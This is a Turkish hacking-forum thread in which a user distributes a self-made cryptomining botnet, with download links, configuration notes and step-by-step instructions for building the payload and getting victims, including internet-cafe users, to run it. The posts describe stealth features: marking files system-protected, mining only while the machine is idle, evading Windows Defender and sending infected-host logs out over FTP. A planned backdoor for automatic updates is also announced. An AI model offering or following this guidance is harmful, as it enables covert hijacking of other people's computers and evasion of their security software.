Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

zalim5811

zalim5811

Üye
3 Eki 2012
72
30
Kendi yazdığım bot miner'ı sizinle paylaşmak istiyorum. Açık kaynak kodlu bir CPU miner'ı daemon olarak kullanıyorum. SHA-256 ve Scrypt algoritmaları ile kazabiliyor. Bir crypto pool hesabı açarak konfigürasyonu yaptıktan sonra zombi olacak kullanıcılara distrubutionı yaparak siz de kazmaya başlayabilirsiniz.


Özelliklerinden bahsetmek gerekirse:
- Kaç thread ile kazılacağına pc idle da veya değilken akıllıca karar verir.
- Fark edilmemek amacı ile yalnızca idle da veya her zaman ama belli aralıklar kazı yaptırılılabilir.
- Fark edilmemek için kernel32'daki SET_FILE_ATTRIBUTE ile dosyalarını "System Protected" olarak marklar.
- Hala zombi sistemde çalışıp çalışmadığını kontrol edebilmeniz için FTP üzerinden zombi sistem bilgisini içeren loglar yollar.
- Komutlar sadece daemon tarafından okunabilen pipe'lar kullanılarak executelanır.



Ayar açıklamaları:
- Pool adres = stratum+tcp://stratum.POOLADRESINIZ.com:pORT şeklinde olmalı. (Stratum zorunlu değil. Ben slushpool kullanıyorum tavsiye ederim.)
- Pool K. adı ve şifre = self explanatory
- FTP adres = başında ftp:// olmamalı files.ADRESİNİZ.com gibi. (000webhost kullanıyorum tavsiye ederim)
- FTP K. adı ve şifre = self explanatory
- Idle/Non-Idle'da restart süresi = PC idle(screen saver başladığında) durumda veya değil iken terminate edildikten sorna tekar başlatılacağı süre.
- Idle/Non-Idle'da terminate süresi = PC idle(screen saver başladığında) durumda veya değil iken terminate edilme süresi.
Bu seçeneğin amacı bilgisayar çalışırken belli aralıklarla miner'ı çalıştırarak kullanıcıya fark edilmemektir.
Örneğin: Non-Idle'da 30dk'da bir restarta ayarlayıp 15dk(900sn)'da bir terminate ettirebilirsiniz.

-


Özetle bu. Bir de exception handling ile pek uğraşmadığım için konfigüre ederken yanlış değeler girmeyin. FTP adresiniz şifreniz k. adı'nız hepsi doğru olsun. Integer girmeniz gereken yere string girmeyin. Program başlatılacağında hook.dll ile aynı konumda olsun. Yoksa çalışmaz.


Kullanım için yapmanız gereken wrapper ile exe ve dll'yi oluşturduktan sonra exe ve dll aynı konumda iken açacak şekilde kurbana ulaştırmanız.



virustotal: https://www.virustotal.com/gui/file...b33a585ee9fbbae777eac6a1c426328c8e4/detection

indir: https://drive.google.com/open?id=1P-SuQbUU6paI6ZXA2NB47a2icVgJ4rGf







*Çoğu anti-virüs tarafından miner olarak algılanabiliyor ama genel olarak safe.



*Developer fee olarak zombi sistemde kazılan sürenin 3/4 ünü size 1/4 ünü de benim pool hesabım için harcayacak.
 
zalim5811

zalim5811

Üye
3 Eki 2012
72
30
calistigina dair birkac kanıt :) su an sadece birkac kisiye kazdiriyorum. bu sayinin cok daha yuksek oldugunu dusunun.
7B98ZN.jpg

r0Wdv3.jpg
 
NYANKO

NYANKO

Üye
22 Eki 2019
215
2
Freeware olmasının bir karşılığı var diyorsunuz :)
Ben bunun gibi bi zombi mining sistemini yazdım hattaki açıldıktan sonra; antivirüsler tarafından bile silinemeyecek şekilde kodlama yaptım, bi arkadaşla. 45 günde proje bitti.
Herşey tamamda sizin gibi biri neden vt kullanmış anlayabilmiş değilim.
Konu için teşekkürler :)
 
zalim5811

zalim5811

Üye
3 Eki 2012
72
30
NYANKO' Alıntı:
Freeware olmasının bir karşılığı var diyorsunuz :)
Ben bunun gibi bi zombi mining sistemini yazdım hattaki açıldıktan sonra; antivirüsler tarafından bile silinemeyecek şekilde kodlama yaptım, bi arkadaşla. 45 günde proje bitti.
Herşey tamamda sizin gibi biri neden vt kullanmış anlayabilmiş değilim.
Konu için teşekkürler :)
Genişletmek için tıkla ...
benim kodum çok kompleks değil hatta birkaç gün sürdü yazmam tek basima. hani ugrasacak olsam kernel driver olarak yazarim antivirusun allahi olsa bulamaz ama 3-5 kişi kullanacak diye de insanin bu kadar uğraş veresi gelmiyor. istek olursa kodu da paylaşırım sıkıntı değil ama madem benden baska birkaç kişi kullanacak en azindan bi kazancım olsun diye oyle yazdim :)
NYANKO' Alıntı:
vt kullanmış
Genişletmek için tıkla ...
o ne demek ola ki?
 
Son düzenleme:
NYANKO

NYANKO

Üye
22 Eki 2019
215
2
zalim581' Alıntı:
benim kodum çok kompleks değil hatta birkaç gün sürdü yazmam tek basima. hani ugrasacak olsam kernel driver olarak yazarim antivirusun allahi olsa bulamaz ama 3-5 kişi kullanacak diye de insanin bu kadar uğraş veresi gelmiyor. istek olursa kodu da paylaşırım sıkıntı değil ama madem benden baska birkaç kişi kullanacak en azindan bi kazancım olsun diye oyle yazdim :)

o ne demek ola ki?
Genişletmek için tıkla ...

virustotal'e atman daha çok patlamasıne vesile olacaktır demek.
Bak ben az önce attım yanlışlıkla
SONUCA TIKLA
1 senedir saklıyordum sen düşün hocam :) bu kernelli lakin eset benim kerneli bozdu attı iyi mi :) buna üzüldüm işte
 
Son düzenleme:
zalim5811

zalim5811

Üye
3 Eki 2012
72
30
NYANKO' Alıntı:
virustotal'e atman daha çok patlamasıne vesile olacaktır demek.
Bak ben az önce attım yanlışlıkla
SONUCA TIKLA
1 senedir saklıyordum sen düşün hocam :) bu kernelli lakin eset benim kerneli bozdu attı iyi mi :) buna üzüldüm işte
Genişletmek için tıkla ...
o konuda sıkıntı yok :) zaten wrapper olarak attim. zombi sisteme atilacak exe wrapper tarafindan olusturuluyor. yani virus ya da btc miner olarak algilanacak kod dl linkini attigim wrapper degil, onun olusturdugu exenin icinde.
vtden signature database cekiyorsa avler sadece wrapperinki onlarda olacak :)
 
Son düzenleme:
InFLaMS

InFLaMS

Yeni üye
16 Ocak 2016
20
1
Teşekkürler eline sağlık. Bunu kurban olarak bir internet cafeye göndermemiz durumunda ve çalıştığında imajda kayıtlı kalacak mı? Deep freezy mesela hiç bir işlem kayıtlı kalmamakta.
 
zalim5811

zalim5811

Üye
3 Eki 2012
72
30
S1berTurk' Alıntı:
İnternet kafede açsak deepfreezden sonra silinir mi
Genişletmek için tıkla ...
InFLaMS' Alıntı:
Teşekkürler eline sağlık. Bunu kurban olarak bir internet cafeye göndermemiz durumunda ve çalıştığında imajda kayıtlı kalacak mı? Deep freezy mesela hiç bir işlem kayıtlı kalmamakta.
Genişletmek için tıkla ...
deepfreeze in nasil calistigini tam olarak bilmiyorum. ama bildigim kadariyla kaldirmasi kolay bir koruma. eger internet cafelerde acmak gibi planiniz varsa biraz bekleyin cunku yeni bir update geliyor. otomatik guncelleme icin backdoor falan acicam :)

UPDATE

changelog:
- CPU miner daemon değiştirildi ve güncellendi.
- Artık sadece x64 sistemlerde kazı yapılabilecek.
- Artık Windows Defender tarafından algılanmıyor(en azından öyle umuyorum).
- Termination işlemindeki bug giderildi..
- CPU usage ve logical thread kullanımı geliştirildi.
- FTP logging birazcık detaylandırıldı.
- Pool olarak NiceHash'e geçildi. (en karlı pool)
- Değiştirilebilen bağış seviyesi eklendi. (0 yapmazsanız mutlu olurum ama yine de size kalmış :) )
- Değiştirilebilen max CPU kullanımı eklendi. (biraz buglı şu an 60dan sonraki değerlerde)

Adım adım anlatım:
1. www.nicehash.com dan üyelik alın
2. bitcoin cüzdanı açın ve mining adress inizi kopyalayın. (https://i.hizliresim.com/YdnrXa.png)
3. address le beraber configdeki isteğe bağlı diğer alanları doldurun.
4. wrapper exe yi çalıştırın.
5. btnet klasöründeki dll ve exe yi zombi olacak sistemi ulaştırıp açın.
bu kadar.

son update: https://www.turkhackteam.org/8969323-post31.html



Muratozturk' Alıntı:
beklemedeyiz
Genişletmek için tıkla ...
Geldi :)
 
Son düzenleme:
Muratozturk

Muratozturk

Katılımcı Üye
21 Nis 2016
379
0
Izmir
zalim581' Alıntı:
UPDATE

changelog:
- CPU miner daemon değiştirildi ve güncellendi.
- Artık sadece x64 sistemlerde kazı yapılabilecek.
- Artık Windows Defender tarafından algılanmıyor(en azından öyle umuyorum).
- Termination işlemindeki bug giderildi..
- CPU usage ve logical thread kullanımı geliştirildi.
- FTP logging birazcık detaylandırıldı.
- Pool olarak NiceHash'e geçildi. (en karlı pool)
- Değiştirilebilen bağış seviyesi eklendi. (0 yapmazsanız mutlu olurum ama yine de size kalmış :) )
- Değiştirilebilen max CPU kullanımı eklendi. (biraz buglı şu an 60dan sonraki değerlerde)

Adım adım anlatım:
1. www.nicehash.com dan üyelik alın
2. bitcoin cüzdanı açın ve mining adress inizi kopyalayın. (https://i.hizliresim.com/YdnrXa.png)
3. address le beraber configdeki isteğe bağlı diğer alanları doldurun.
4. wrapper exe yi çalıştırın.
5. btnet klasöründeki dll ve exe yi zombi olacak sistemi ulaştırıp açın.
bu kadar.

DL: https://drive.google.com/open?id=1mKajnyRVddfXOf6Ukvaa0mCiBP7g018O




Geldi :)
Genişletmek için tıkla ...

Hocam ILMerge yapıp dllyi içine gömsek exenin olur mu?

Hocam açtım tamam loga düştü ama nicehash kısmında riglerim kısmında 0 boş neden?
 
Moderatör tarafında düzenlendi:
zalim5811

zalim5811

Üye
3 Eki 2012
72
30
kendi bilgisayarinda acmasaydin keske. nasil temizlemeyi planliyorsun :) temizlemek icin bi script atabilirim istersen.
nicehash de gozukmeme sebebine bakicam. bazen 2. veya 3. sefer basladiginda nicehashde gozukuyor.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.